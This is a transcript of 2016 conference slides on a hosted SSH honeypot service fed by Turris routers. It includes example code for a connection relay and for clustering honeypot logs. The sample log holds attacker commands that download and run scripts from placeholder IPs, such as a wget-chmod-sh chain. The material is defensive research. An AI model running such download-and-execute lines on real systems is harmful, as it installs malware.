Honeypot as a Service Bedřich Košata • bedrich.kosata@nic.cz • 26 May 2016.

What is a honeypot?
- A deliberately vulnerable machine (or service) used to observe attackers' behaviour
- Usually simulated or sandboxed so that a compromise does no real harm
- Typically protocol-specific (SSH, Telnet, SMTP, etc.)

Common honeypot pitfalls
- Small numbers: few instances, so little data
- Fixed, dedicated IP addresses end up on attackers' blacklists over time
- Imperfect simulation: attackers can detect that they are in a honeypot
- It would be great to put honeypots on end users' machines instead

Project Turris
- 2000 custom routers given to people in the Czech Republic
- Used as a network security probe
- Users are required to have a public IPv4 address

Turris as honeypot
- Offers a large number of instances
- Geographically and topologically diverse
- Some IP addresses change from time to time, so the set cannot be blacklisted once and for all
- Interesting proof of concept
- Must not endanger users!

Honeypot as a Service

Honeypot as a Service
- Used for SSH
- The honeypot itself runs on a CZ.NIC-maintained server, not on the router
- The user just installs a simple client program on the router
- One port (one honeypot instance) on the server is dedicated to each client
- Centrally maintained and improved, which helps fight honeypot detection
- Logged sessions are presented to the users and analysed centrally

SSH honeypot technology - server
- Based on Cowrie, written in Python, a fork of the popular Kippo honeypot
- Extended to run many instances on different ports (one per client)
- Available at https://gitlab.labs.nic.cz/turris/cowrie-multiport

SSH honeypot technology - client
- Based on mitmproxy
- Performs a man-in-the-middle "attack" on the connection: the attacker connects to the router, and the client relays the session to the router's dedicated port on the central server
- Available at https://gitlab.labs.nic.cz/labs/mitmproxy
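The router/server split described on the preceding three slides, as an added example that is not the Turris client or any CZ.NIC code: a router-side relay accepts the attacker's TCP connection locally and pipes it to the port on the central server dedicated to this router. Addresses and ports are assumptions, and the "central honeypot" is a stand-in that greets with an SSH-style banner and echoes one line, so the example runs offline. The real client works at the SSH layer with mitmproxy; this one is transport-level only, so the central server would see the router's address as the peer, and it is the per-router port, not the source address, that ties a session back to a user.

```python
"""Router-side relay for a hosted SSH honeypot (added example, not the
Turris client): accept the attacker's connection on the router and pipe it
to this router's dedicated port on the central honeypot server.

The addresses below are assumptions; the 'central honeypot' is a stand-in
that sends an SSH-style banner and echoes one line, so this runs offline.
The real client works at the SSH layer (mitmproxy); this one is
transport-level only."""
import socket
import threading

HONEYPOT_BANNER = b"SSH-2.0-OpenSSH_6.0p1 Debian-4+deb7u2\r\n"  # constructed banner


def _pump(src, dst):
    """Copy bytes src -> dst until src closes, then half-close dst."""
    try:
        while True:
            data = src.recv(4096)
            if not data:
                break
            dst.sendall(data)
    except OSError:
        pass
    finally:
        try:
            dst.shutdown(socket.SHUT_WR)
        except OSError:
            pass


def relay_connection(attacker, upstream_addr):
    """One attacker session: open the dedicated upstream port, pump both ways."""
    upstream = socket.create_connection(upstream_addr, timeout=10)
    pumps = [threading.Thread(target=_pump, args=(attacker, upstream), daemon=True),
             threading.Thread(target=_pump, args=(upstream, attacker), daemon=True)]
    for t in pumps:
        t.start()
    for t in pumps:
        t.join()
    attacker.close()
    upstream.close()


def _serve(listen_addr, handler):
    """Accept loop in a background thread; returns the listening socket."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    srv.bind(listen_addr)
    srv.listen(16)

    def loop():
        while True:
            try:
                conn, _ = srv.accept()
            except OSError:  # listening socket was closed
                return
            threading.Thread(target=handler, args=(conn,), daemon=True).start()

    threading.Thread(target=loop, daemon=True).start()
    return srv


def start_relay(listen_addr, upstream_addr):
    """What the router runs: listen on its public SSH port, relay to its slot upstream."""
    return _serve(listen_addr, lambda conn: relay_connection(conn, upstream_addr))


def start_fake_honeypot(listen_addr):
    """Stand-in for one Cowrie instance on the central server (constructed)."""
    def handle(conn):
        with conn:
            conn.sendall(HONEYPOT_BANNER)
            line = b""
            while not line.endswith(b"\n"):
                chunk = conn.recv(1024)
                if not chunk:
                    return
                line += chunk
            conn.sendall(b"echo: " + line)
    return _serve(listen_addr, handle)


def demo():
    """Attacker -> relay -> fake honeypot, all on loopback; returns (banner, reply)."""
    honeypot = start_fake_honeypot(("127.0.0.1", 0))
    slot = ("127.0.0.1", honeypot.getsockname()[1])  # this router's dedicated port
    relay = start_relay(("127.0.0.1", 0), slot)
    try:
        with socket.create_connection(relay.getsockname(), timeout=10) as attacker:
            banner = attacker.recv(1024)
            attacker.sendall(b"uname -a\n")
            reply = attacker.recv(1024)
    finally:
        relay.close()
        honeypot.close()
    return banner, reply


if __name__ == "__main__":
    print(demo())
```

On a real router the relay would bind the public SSH port and the upstream address would be the CZ.NIC server with this router's assigned port; everything the attacker types reaches the central Cowrie instance and nothing runs on the router itself.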

Hosted SSH honeypot - 2016
- Used by about 350 users
- About 2000 sessions/day, 4 commands per session
- 36,000 unique attacker IP addresses since 1 January 2016

SSH honeypot results - 2016
- 13,000 attackers use exactly the same set of commands in the same order, i.e. scripted sessions
- Over 70 % of them are from Argentina (mostly Telefonica de Argentina)
- Over 50 % have port 7547 open (TR-069/CWMP, DSL provisioning)

Results from SSH honeypot (chart slides; no text in the transcript)
SSH honeypot results - 2016
- 55,000 wget commands
- 2,000 unique download URLs
- 676 unique download IPs
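The two results slides above rest on two analyses: grouping sessions whose command sequence is identical (same commands, same order) and counting wget downloads, URLs and hosts. As an added example, not code from the talk or from the CZ.NIC analysis, the script below does both over Cowrie-style JSON logs: each session is fingerprinted by its exact ordered command list, and wget/curl statements are parsed for the URLs they fetch. The log lines are constructed to mimic Cowrie's JSON output; the field names (`eventid`, `session`, `src_ip`, `input`) are an assumption about that format, and all IPs come from documentation ranges.

```python
"""Cluster SSH-honeypot sessions by exact command sequence and extract
download URLs from wget/curl commands.

Added example, not code from the talk or the Turris project. The log below
is constructed to mimic Cowrie's JSON output (one event per line, eventid
"cowrie.command.input" carrying the typed command); the field names are an
assumption about that format and the IPs are documentation ranges."""
import hashlib
import json
import re
from collections import defaultdict
from urllib.parse import urlsplit

# Constructed sample: three scripted sessions with an identical command
# sequence, one with the same commands in a different order, one hand-driven.
SAMPLE_LOG = """
{"eventid": "cowrie.login.success", "session": "s1", "src_ip": "192.0.2.11", "username": "root", "password": "admin"}
{"eventid": "cowrie.command.input", "session": "s1", "src_ip": "192.0.2.11", "input": "cd /tmp || cd /var/run"}
{"eventid": "cowrie.command.input", "session": "s1", "src_ip": "192.0.2.11", "input": "wget http://198.51.100.7/bins.sh; chmod 777 bins.sh; sh bins.sh"}
{"eventid": "cowrie.command.input", "session": "s1", "src_ip": "192.0.2.11", "input": "rm -rf bins.sh"}
{"eventid": "cowrie.command.input", "session": "s2", "src_ip": "192.0.2.12", "input": "cd /tmp || cd /var/run"}
{"eventid": "cowrie.command.input", "session": "s2", "src_ip": "192.0.2.12", "input": "wget http://198.51.100.7/bins.sh; chmod 777 bins.sh; sh bins.sh"}
{"eventid": "cowrie.command.input", "session": "s2", "src_ip": "192.0.2.12", "input": "rm -rf bins.sh"}
{"eventid": "cowrie.command.input", "session": "s3", "src_ip": "192.0.2.13", "input": "cd /tmp || cd /var/run"}
{"eventid": "cowrie.command.input", "session": "s3", "src_ip": "192.0.2.13", "input": "wget http://198.51.100.7/bins.sh; chmod 777 bins.sh; sh bins.sh"}
{"eventid": "cowrie.command.input", "session": "s3", "src_ip": "192.0.2.13", "input": "rm -rf bins.sh"}
{"eventid": "cowrie.command.input", "session": "s4", "src_ip": "192.0.2.14", "input": "wget http://198.51.100.7/bins.sh; chmod 777 bins.sh; sh bins.sh"}
{"eventid": "cowrie.command.input", "session": "s4", "src_ip": "192.0.2.14", "input": "cd /tmp || cd /var/run"}
{"eventid": "cowrie.command.input", "session": "s4", "src_ip": "192.0.2.14", "input": "rm -rf bins.sh"}
{"eventid": "cowrie.command.input", "session": "s5", "src_ip": "192.0.2.15", "input": "uname -a"}
{"eventid": "cowrie.command.input", "session": "s5", "src_ip": "192.0.2.15", "input": "cat /proc/cpuinfo"}
{"eventid": "cowrie.command.input", "session": "s5", "src_ip": "192.0.2.15", "input": "wget http://203.0.113.50/x86 -O /tmp/x86"}
{"eventid": "cowrie.command.input", "session": "s5", "src_ip": "192.0.2.15", "input": "curl http://203.0.113.50/mips -o /tmp/mips"}
"""

URL_RE = re.compile(r"^(?:https?|ftp)://")


def parse_sessions(lines):
    """Group typed commands by session id, keeping order; map session -> source IP."""
    commands, source = defaultdict(list), {}
    for line in lines:
        line = line.strip()
        if not line:
            continue
        ev = json.loads(line)
        if ev.get("eventid") != "cowrie.command.input":
            continue  # logins, downloads etc. are not part of the command sequence
        commands[ev["session"]].append(ev["input"])
        source[ev["session"]] = ev["src_ip"]
    return dict(commands), source


def fingerprint(cmds):
    """Hash of the ordered command list: two sessions share it only if they ran
    exactly the same commands in exactly the same order."""
    return hashlib.sha256("\n".join(cmds).encode()).hexdigest()[:16]


def cluster_sessions(commands):
    clusters = defaultdict(list)
    for sid, cmds in commands.items():
        clusters[fingerprint(cmds)].append(sid)
    return dict(clusters)


def download_requests(cmds):
    """Return (number of wget/curl invocations, list of URLs they fetch)."""
    count, urls = 0, []
    for cmd in cmds:
        for stmt in re.split(r"\s*(?:;|&&|\|\||\||&)\s*", cmd):
            tokens = stmt.split()
            if tokens and tokens[0] in ("wget", "curl"):
                count += 1
                urls.extend(t for t in tokens[1:] if URL_RE.match(t))
    return count, urls


def summarize(lines):
    commands, source = parse_sessions(lines)
    clusters = cluster_sessions(commands)
    biggest = max(clusters.values(), key=len)
    n_downloads, all_urls = 0, []
    for cmds in commands.values():
        n, urls = download_requests(cmds)
        n_downloads += n
        all_urls.extend(urls)
    return {
        "n_sessions": len(commands),
        "n_src_ips": len(set(source.values())),
        "largest_cluster_size": len(biggest),
        "largest_cluster_commands": commands[biggest[0]],
        "n_download_cmds": n_downloads,
        "unique_urls": sorted(set(all_urls)),
        "unique_download_hosts": sorted({urlsplit(u).hostname for u in all_urls}),
    }


if __name__ == "__main__":
    for key, value in summarize(SAMPLE_LOG.splitlines()).items():
        print(key, value)
```

Because the fingerprint covers the ordered list, session s4 (same commands, different order) lands in its own cluster; that is the distinction the slide draws when it says "the same set of commands in the same order". Replace SAMPLE_LOG with the lines of a real Cowrie JSON log to get the cluster sizes, URL and host counts the slides report.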

Future plans
- Will be offered to Turris Omnia users
- Offer honeypot as a service to the public (other routers, servers)
- Move to an open-data release mode
- Create clients for common systems
- Improve data analysis methods
- Raise awareness of the security situation on the Internet

Potential for cooperation
- Cooperate on honeypot software
- Install and run independent honeypot services (data exchange, debugging)
- Create a federated system of honeypot services run in different countries by different hosts

Thank You Bedřich Košata • bedrich.kosata@nic.cz